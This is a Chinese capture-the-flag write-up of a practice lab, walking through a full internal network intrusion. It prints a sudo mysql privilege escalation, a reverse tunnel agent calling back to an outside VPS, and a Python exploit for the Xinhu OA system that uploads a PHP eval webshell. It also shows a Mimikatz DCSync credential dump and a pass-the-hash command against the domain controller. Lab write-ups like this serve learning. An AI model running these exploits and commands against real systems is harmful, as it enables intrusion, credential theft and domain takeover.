春秋云镜Initial

外网打点

进来发现是tp的图标，那就直接用工具一把梭

直接getshell，用蚁剑连接！用sudo提权

sudo mysql -e '\! find / -name flag*'
sudo mysql -e '\! cat /root/flag/f*'

这里是无密码知道密码也可以：
mysql -u root -proot -e "\! whoami" 

拿到第一段flag开始打内网

内网打点

信息收集

/tmp目录下上传一个fscan方便我们漏洞扫描，待会要搭建隧道方便我们浏览器访问内网，所以一起上传

依次执行
chmod +x fscan
./fscan -h 172.22.1.0/24
cat result.txt

172.22.1.18:3306 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:445 open
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:139 open
172.22.1.18:135 open
172.22.1.21:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.2:88 open
[*] NetInfo 
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] NetInfo 
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] NetInfo 
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] OsInfo 172.22.1.2    (Windows Server 2016 Datacenter 14393)
[*] WebTitle http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[+] MS17-010 172.22.1.21    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.2      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

整理一下：

172.22.1.2：DC域控
172.22.1.21：Windows的机器并且存在MS17-010 漏洞
172.22.1.18：信呼OA办公系统

信呼系统

先打信呼的这个系统，建立隧道

把linux_x64_agent上传到/tmp目录，然后执行chmod +x ./linux_x64_agent

把linux_x64_admin上传到自己的vps上，给执行权限后执行：

./linux_x64_admin -l port -s 654321

然后在这台已经getshell的机器上运行：

./linux_x64_agent -c ip:port -s 654321 --reconnect 8

要什么端口，记得先在vps上面开一下

搭建成功，然后在vps上执行

use 0
socks port这个端口也是自己定

然后配置一下代理服务器

相当于我们现在就是以ip:port2的身份去访问内网

说是一个nday，拿infer哥哥的脚本来打一下

import os
import requests

session = requests.session()
proxy = {
    "http": "socks5://ip:port",
}

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}

with open("1.php","w") as f:
    f.write("<?php eval($_POST['cmd']);")
    f.close()

session.post(url1, data=data1, proxies=proxy)
res = session.post(url2, files={'file': open('1.php', 'r+')}, proxies=proxy)
os.remove('1.php')

filepath = str(res.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = res.json()['id']
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

session.get(url3, proxies=proxy)
res = session.post(url_pre + filepath,data={"Infernity":"system('whoami');"}, proxies=proxy)
print(res.text)

然后蚁剑连接一下，蚁剑也要配置好代理，然后就拿下这台机子了

dir flag* /s用/s递归搜索一下

拿到第二段flag

MS17-010

接着开始打永恒之蓝

DCSycn

load kiwi

kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

load kiwi：kiwi 是 Meterpreter 的一个扩展模块，专门用于 Windows 凭据提取（如明文密码、NTLM 哈希、Kerberos 票据等）。

该命令模拟域控制器（DC）的同步行为，从 xiaorang.lab 域中提取所有用户、计算机、组等对象的 NTLM 哈希 和 Kerberos 密钥，并以 CSV 格式输出。

这里我们抓到了Administrator的hash，所以可以直接用crackmapexec打hash传递了

proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

至此拿到flag

总结

总的来说自己还是有些不懂，有几个地方比如DCSycn攻击那部分自己还不是特别懂，后面去学一下，也是体验了一下内网渗透的流程